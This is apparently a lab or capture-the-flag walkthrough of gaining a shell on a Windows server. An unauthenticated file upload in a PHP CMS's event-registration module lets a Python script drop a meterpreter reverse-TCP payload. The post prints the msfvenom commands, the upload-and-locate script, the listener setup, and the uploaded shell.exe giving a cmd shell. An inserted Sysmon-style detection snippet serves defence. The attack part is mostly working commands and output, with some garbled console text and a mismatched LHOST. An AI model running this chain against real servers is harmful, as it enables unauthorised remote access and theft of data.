有梦就能实现 2020-03-04
Local attacker machine: Kali Linux, 192.168.1.2
Target: Windows NT server, 192.168.1.4
Goal: obtain a shell on the target.
First open a terminal on Linux and start msfconsole.
Build the PHP payload, shell.php:
:~# rz
:~# msfconsole
msf > msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php

No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30092 bytes
Upload it to the server with a script. The Python script below was written locally on Windows and then transferred to Kali with rz in Xshell. Provided by my classmate pxy.
import requests

base_url = 'http://192.168.1.4/'
url_for_time = 'index.php?module=eventregistration&action=eventsCalendar'
url_for_upload = 'index.php?module=eventregistration&action=emailRegistrants&&email_message=1&email_subject=1'

# Upload shell.php as the attachment of the emailRegistrants action.
with open('shell.php', 'rb') as f:
    requests.post(base_url + url_for_upload, files={'attach': f})
print('upload finish')

# The calendar page embeds the server's current Unix timestamp; the stored
# attachment is saved as <timestamp>_shell.php, so read the time from there.
r = requests.get(base_url + url_for_time)
html1 = r.text
index = html1.find('History.pushState')
if index == -1:  # str.find() returns -1, not 0, when the marker is absent
    print('something wrong')
    exit(0)
time = html1[index:index + 60].split('rel')[1].split("'")[1]
print('get time:' + time)

# Walk back up to 20 seconds from that timestamp until the file is found.
for i in range(int(time), int(time) - 20, -1):
    shell_url = base_url + 'tmp/' + str(i) + '_shell.php'
    r2 = requests.get(shell_url)
    if r2.status_code == 200:
        print('shell is here : ' + shell_url)
Then, in msfconsole, use multi/handler to start the listener: set the payload to php/meterpreter_reverse_tcp, set LHOST and LPORT, and run exploit.
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.2:4444
Visit the uploaded page.
The local terminal then shows that a session has been established.
sessions lists the existing sessions; sessions -i 1 interacts with the first one.
With this PHP session you can do basic operations such as pwd,
but you cannot get a Windows shell from it, which is why the next step builds a Windows payload.
msf exploit(handler) >
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:49203) at 2020-02-27 01:02:27 -0500

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  30092  fil   2020-02-26 16:59:10 -0500  1582754354_shell.php
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  css
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  elfinder
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  extensionuploads
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  img_cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  minify
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  pixidou
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  rsscache
40777/rwxrwxrwx   32768  dir   2018-01-10 13:44:24 -0500  views_c
Then open a new terminal, start msfconsole, and build the Windows payload, shell.exe. Note that its port must not be the same as the one used for the PHP payload.
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
Then upload it to the server through the PHP session obtained earlier:
meterpreter > upload shell.exe
[*] uploading  : shell.exe -> shell.exe
[*] uploaded   : shell.exe -> shell.exe
meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  30092  fil   2020-02-26 16:59:10 -0500  1582754354_shell.php
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  css
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  elfinder
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  extensionuploads
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  img_cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  minify
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  pixidou
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  rsscache
100777/rwxrwxrwx  73802  fil   2020-02-26 17:02:33 -0500  shell.exe
40777/rwxrwxrwx   32768  dir   2018-01-10 13:44:24 -0500  views_c
Now, in the new terminal, use multi/handler to start the listener: set the payload to windows/meterpreter/reverse_tcp, set LHOST and LPORT, and run exploit.
:~# msfconsole

       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.2:443
Then run the Windows payload just uploaded from the PHP session with execute -f shell.exe:
meterpreter > execute shell.exe
[-] You must specify an executable file with -f
meterpreter > execute shell.exe -f
[-] You must specify an executable file with -f
meterpreter > execute -f shell.exe
Process 2640 created.
Now look at the new terminal: a session has come in.
It can be used in the same way as the PHP session above,
and this time the Windows shell is available too:
msf exploit(handler) >
[*] Sending stage (179267 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.4:49204) at 2020-02-27 01:05:06 -0500

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 640 created.
Channel 1 created.
Microsoft Windows [°汾 6.3.9600]
(c) 2013 Microsoft Corporation¡£±£´???{¡£

C:\phpStudy\WWW\tmp>cd C:
cd C:
C:\phpStudy\WWW\tmp

C:\phpStudy\WWW\tmp>cd^H^H^H
‘ ²»ˇ?²¿»??¿?®£¬?²»ˇ¿??е?? »??¦mτ¼þ¡£

C:\phpStudy\WWW\tmp>c:
c:
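From the defender's side, the chain above (a web-server worker launching shell.exe out of the web root, which then spawns cmd.exe) is visible in process-creation telemetry. The following is an added example, not code from the original post: it runs simple parent/child rules over constructed Sysmon-style event lines. The php-cgi.exe and httpd.exe paths, the worker image names and the one-line Key=Value event format are assumptions; only the web root C:\phpStudy\WWW comes from the listings above.

```python
import re
from pathlib import PureWindowsPath
WEB_ROOT = PureWindowsPath(r"C:\phpStudy\WWW")        # web root seen in the listing above
WEB_WORKERS = {"httpd.exe", "php-cgi.exe", "php.exe"}  # assumed web-server image names
EXPECTED_CHILDREN = {("httpd.exe", "php-cgi.exe")}    # normal FastCGI fan-out, no alert
SHELLS = {"cmd.exe", "powershell.exe"}
# Constructed, simplified Sysmon Event ID 1 lines (not real logs); paths are assumed.
SAMPLE_EVENTS = r"""
Image=C:\phpStudy\PHPTutorial\php\php-cgi.exe ParentImage=C:\phpStudy\Apache\bin\httpd.exe
Image=C:\phpStudy\WWW\tmp\shell.exe ParentImage=C:\phpStudy\PHPTutorial\php\php-cgi.exe
Image=C:\Windows\System32\cmd.exe ParentImage=C:\phpStudy\WWW\tmp\shell.exe
Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe
"""
FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Turn 'Key=Value Key=Value' into a dict (values contain no spaces here)."""
    return dict(FIELD_RE.findall(line))

def under(path, root):
    """True if path lies inside root; PureWindowsPath compares case-insensitively."""
    try:
        PureWindowsPath(path).relative_to(root)
        return True
    except ValueError:
        return False

def classify(event):
    """Reasons why one process-creation event matches the chain in the post."""
    image, parent = PureWindowsPath(event["Image"]), PureWindowsPath(event["ParentImage"])
    img, par = image.name.lower(), parent.name.lower()
    reasons = []
    if par in WEB_WORKERS and (par, img) not in EXPECTED_CHILDREN:
        reasons.append("web worker spawned a child process")          # execute -f shell.exe
    if under(image, WEB_ROOT):
        reasons.append("executable launched from the web root")       # WWW\tmp\shell.exe
    if img in SHELLS and (par in WEB_WORKERS or under(parent, WEB_ROOT)):
        reasons.append("interactive shell spawned from web context")  # meterpreter 'shell'
    return reasons

def scan(log_text):
    """Return [(event number, reasons)] for every suspicious event in the log text."""
    hits = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        reasons = classify(parse_event(line))
        if reasons:
            hits.append((n, reasons))
    return hits
```

Events 2 and 3 of the sample are flagged (the payload launch and the cmd.exe spawn), while the normal httpd.exe to php-cgi.exe fan-out and the explorer.exe child are not.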
In cmd, the command chcp 65001 switches the console code page to UTF-8, after which the garbled output becomes readable:

C:\>type 2.key
type 2.key
¾??¡£

C:\>chcp 65001
chcp 65001
Active code page: 65001

C:\>type 2.key
type 2.key
Access is denied.